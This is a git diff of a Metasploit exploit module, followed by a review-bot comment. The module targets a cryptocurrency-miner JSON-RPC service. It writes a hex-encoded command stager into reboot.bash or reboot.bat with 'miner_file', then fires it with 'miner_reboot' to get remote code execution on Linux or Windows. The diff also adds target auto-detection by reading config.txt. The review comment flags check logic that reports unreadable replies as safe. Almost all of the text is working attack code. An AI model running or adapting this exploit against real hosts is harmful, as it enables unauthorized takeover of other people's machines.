refactor: universal check, payload platform check
parent
e9db949418
commit
53f158ef4f
|
@ -33,16 +33,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Platform' => ['win', 'linux'],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { 'auto' => true }],
|
||||
[ 'Linux',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X64
|
||||
'Arch' => ARCH_X64,
|
||||
'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf' ]
|
||||
}
|
||||
],
|
||||
[ 'Windows',
|
||||
{
|
||||
'Platform' => 'windows',
|
||||
'Arch' => ARCH_X64
|
||||
'Arch' => ARCH_X64,
|
||||
'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
|
||||
}
|
||||
]
|
||||
],
|
||||
|
@ -60,66 +63,34 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
case target['Platform']
|
||||
when 'linux'
|
||||
cmd = Rex::Text.to_hex(cmd, '')
|
||||
when 'windows'
|
||||
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
|
||||
end
|
||||
case target['Platform']
|
||||
when 'linux'
|
||||
upload = {
|
||||
def select_target
|
||||
data = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
"method" => 'miner_file',
|
||||
"params" => ['reboot.bash', "#{cmd}"]
|
||||
}.to_json
|
||||
when 'windows'
|
||||
upload = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
"method" => 'miner_file',
|
||||
"params" => ['reboot.bat', "#{cmd}"]
|
||||
}.to_json
|
||||
end
|
||||
begin
|
||||
connect
|
||||
sock.put(upload)
|
||||
buf = sock.get_once || ''
|
||||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||
print_error(e)
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
trigger_vulnerability
|
||||
end
|
||||
|
||||
def trigger_vulnerability
|
||||
execute = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
"method" => 'miner_reboot'
|
||||
"method" => 'miner_getfile',
|
||||
"params" => ['config.txt']
|
||||
}.to_json
|
||||
connect
|
||||
sock.put(execute)
|
||||
sock.put(data)
|
||||
buf = sock.get_once || ''
|
||||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||
print_error(e)
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
def exploit
|
||||
case target['Platform']
|
||||
when 'linux'
|
||||
execute_cmdstager
|
||||
when 'windows'
|
||||
execute_cmdstager(linemax: 20000)
|
||||
tmp = StringIO.new
|
||||
tmp << buf
|
||||
tmp2 = tmp.string
|
||||
hex = ''
|
||||
if tmp2.scan(/\w+/)[5]
|
||||
return self.targets[1]
|
||||
elsif tmp2.scan(/\w+/)[7]
|
||||
return self.targets[2]
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
target = select_target
|
||||
if target.nil?
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
data = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
|
@ -139,9 +110,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
when 'windows'
|
||||
hex = tmp2.scan(/\w+/)[7]
|
||||
end
|
||||
if not hex
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
str = Rex::Text.hex_to_raw(hex)
|
||||
if str.include?('WARNING')
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
|
@ -149,9 +117,69 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||
vprint_error(e)
|
||||
vprint_error(e.message)
|
||||
return Exploit::CheckCode::Unknown
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
target = select_target
|
||||
case target['Platform']
|
||||
when 'linux'
|
||||
cmd = Rex::Text.to_hex(cmd, '')
|
||||
upload = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
"method" => 'miner_file',
|
||||
"params" => ['reboot.bash', "#{cmd}"]
|
||||
}.to_json
|
||||
when 'windows'
|
||||
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
|
||||
upload = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
"method" => 'miner_file',
|
||||
"params" => ['reboot.bat', "#{cmd}"]
|
||||
}.to_json
|
||||
end
|
||||
|
||||
connect
|
||||
sock.put(upload)
|
||||
buf = sock.get_once || ''
|
||||
trigger_vulnerability
|
||||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
|
||||
fail_with(Failure::UnexpectedReply, e.message)
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
def trigger_vulnerability
|
||||
execute = {
|
||||
"id" => 0,
|
||||
"jsonrpc" => '2.0',
|
||||
"method" => 'miner_reboot'
|
||||
}.to_json
|
||||
connect
|
||||
sock.put(execute)
|
||||
buf = sock.get_once || ''
|
||||
disconnect
|
||||
end
|
||||
|
||||
def exploit
|
||||
target = select_target
|
||||
if target.nil?
|
||||
fail_with(Exploit::Failure::NoTarget, 'No matching target')
|
||||
end
|
||||
if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
|
||||
(target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i)
|
||||
fail_with Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'"
|
||||
end
|
||||
case target['Platform']
|
||||
when 'linux'
|
||||
execute_cmdstager(flavor: :echo, linemax: 100000)
|
||||
when 'windows'
|
||||
execute_cmdstager(flavor: :vbs, linemax: 100000)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
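Review bot: In `check`, a nil result from `select_target` is reported as `CheckCode::Safe`, but nil only means the `miner_getfile` reply had fewer than six `\w+` tokens, which includes the empty string that `sock.get_once || ''` yields when nothing comes back. Someone using the check to assess a host would read that as "not vulnerable" when nothing was actually determined; `return Exploit::CheckCode::Unknown if target.nil?` is the accurate result. Separately, in `select_target` the `elsif tmp2.scan(/\w+/)[7]` branch looks unreachable, because `scan` returns only strings and any reply with an eighth token also has a sixth, so the platform it reports should be verified against real replies. `execute_command` also indexes `target['Platform']` without the nil guard that `exploit` has, and the local `target` in all three methods shadows the framework's `target` accessor. The body of `check` continues across the following hunks, so the part between the nil guard and the `hex` lookup is not visible here.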